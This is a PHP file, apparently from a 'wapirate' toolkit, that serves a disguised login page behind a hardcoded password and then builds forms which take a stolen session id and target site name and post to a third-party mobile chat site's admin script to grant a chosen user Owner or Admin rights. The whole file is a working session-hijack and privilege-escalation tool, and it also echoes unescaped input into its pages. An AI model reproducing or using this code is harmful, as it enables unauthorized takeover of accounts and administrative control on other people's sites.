View file wapirate/A1/funky.php

File size: 2.78Kb
<?php











header("Content-type: text/html; charset=ISO-8859-1");

echo "<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>";

echo "<!DOCTYPE html PUBLIC \"-//WAPFORUM//DTD XHTML Mobile 1.0//EN\"\"http://www.wapforum.org/DTD/xhtml-mobile10.dtd\">";

echo "<html xmlns=\"http://www.w3.org/1999/xhtml\">";





$xpa = $_GET["xpa"];

$pass = $_POST["pass"];

$a = $_GET["a"];

$sid = $_POST["sid"];

$stype = $_POST["stype"];

$who = $_POST["who"];

$name = $_POST["name"];

$user = $_POST["user"];

$site = $_POST["site"];

if((($a=="happy")&&($pass=="bunghole")&&($user=="")))

{

  echo "<head>";

  echo "<title>!</title>";

  echo "</head>";

  echo "<body>";     

  echo "<form action=\"http://m.mobilinks.com/$site/web/admproc.php?action=uprof&amp;$stype=$sid&amp;who=$who\" method=\"post\">";

  echo "Nickname: <input name=\"unick\" maxlength=\"15\" value=\"$name\"/><br/>";

  echo "Privileges: <select name=\"perm\" value=\"$perm[0]\">";

  echo "<option value=\"4\">Owner</option>";

  echo "<option value=\"3\">Admin</option>";

  echo "</select><br/>";

  echo "<input type=\"submit\" value=\"Update\"/>";

  echo "</form>";

  echo "</body>";  

  exit();

  }









/////////////////////////////////////////////////////////

else if((($a=="magic")&&($pass=="bunghole")&&($user=="")))

{

    echo "<head>";

    echo "<title>!</title>";

    echo "</head>";

    echo "<body>";

    echo "<br/>";

    echo "<form action=\"funky.php?a=happy\" method=\"post\">";

    echo "Name:<input name=\"name\"/><br/>";

    echo "Site(without http://):<input name=\"site\"/><br/>";

    echo "Who:<input name=\"who\"/><br/>";

    echo "Session id:<input name=\"sid\"/><br/>";

    echo "<input name=\"user\" type=\"hidden\" value=\"$user\"/>"; 

    echo "<input name=\"pass\" type=\"hidden\" value=\"$pass\"/>"; 

    echo " Session Type:";

    echo "<select name=\"stype\" value=\"sid\">";

    echo "<option value=\"sid\">sid</option>";

    echo "<option value=\"ses\">ses</option>";

    echo "</select><br/>";

    echo "<br/><input type=\"Submit\" Name=\"Submit\" Value=\"Next\"></form>";

    echo "</body>"; 

    exit();

}

/////////////////////////////////////////////////

else{

  echo "<head>";

  echo "<title>!</title>";

  echo "</head>";

  echo "<body>";  



if($xpa=="byp"){

echo "Invalid User name!<br/>";

echo "Invalid Pass!<br/>";

}

  echo "<form action=\"funky.php?a=magic&amp;xpa=byp\" method=\"post\">";

  echo "User:<br/> <input name=\"user\" format=\"*x\" size=\"8\" maxlength=\"30\"/><br/>";

  echo "Password:<br/> <input type=\"password\" name=\"pass\" size=\"8\" maxlength=\"30\"/><br/>";

  echo "<br/><input type=\"Submit\" Name=\"Submit\" Value=\"Add\"></form>";

  echo "</body>";

}





	echo "</html>";

?>